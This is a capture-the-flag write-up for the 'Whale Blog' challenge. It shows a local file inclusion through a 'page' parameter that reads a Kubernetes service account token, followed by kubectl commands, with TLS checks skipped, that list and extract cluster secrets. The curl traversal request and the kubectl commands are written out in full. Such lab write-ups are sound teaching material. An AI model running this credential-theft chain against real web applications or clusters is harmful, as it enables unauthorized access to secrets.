Tags: kubernetes lfi
Rating:
# writeup
Write up for the `Whale Blog` challenge
## Enumeration phase
After checking source for the `http://whale-blog.duc.tf:30000/` we can see useful information:
```html
Warning: Undefined array key "page" in /var/www/html/index.php on line 3
```
* the `page` parameter could be changed
* files are in the `/var/www/html/` directory
```html
I wonder if we will deploy this at whale-blog.duc.tf or at whale-endpoint.duc.tf
```
* two domains exist `whale-blog.duc.tf` and `whale-endpoint.duc.tf` and application is contenerised in docker
Based on the above information we can predict we're dealing with Application in the Docker container and the orhestrator is probably Kubernetes (`whale-endpoint.duc.tf`).
We can prove it by making a request to this endpoint:
```bash
curl -k https://whale-endpoint.duc.tf/api/
```
and as a result we can see:
```json
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {
},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/api/\"",
"reason": "Forbidden",
"details": {
},
"code": 403
}
```
which means the user without authorization is forbidden.
## Use LFI for getting the credentials
We can use existing LFI for checking the credentials by making request to `http://whale-blog.duc.tf:30000/?page=../../../../var/run/secrets/kubernetes.io/serviceaccount/token`
```bash
curl -s http://whale-blog.duc.tf:30000/\?page\=../../../../var/run/secrets/kubernetes.io/serviceaccount/token |sed -n 's/.*
\(.*\)<\/pre>.*/\1/p' > token
```## Get the flag by using kubernetes API
When we have a token we can start working with kubernetes API:
```bash
kubectl config set-cluster ductf --server=https://whale-endpoint.duc.tf/
kubectl get pods --token=$(cat token)
```We can see the problem with the SSL but we can ignore it by option `--insecure-skip-tls-verify` and we can get secret:
```bash
kubectl --insecure-skip-tls-verify --token=$(cat token) get secrets
kubectl --insecure-skip-tls-verify --token=$(cat token) get secret nooooo-dont-read-me -o jsonpath="{.data}"
```After base64 decode the output we have a flag.
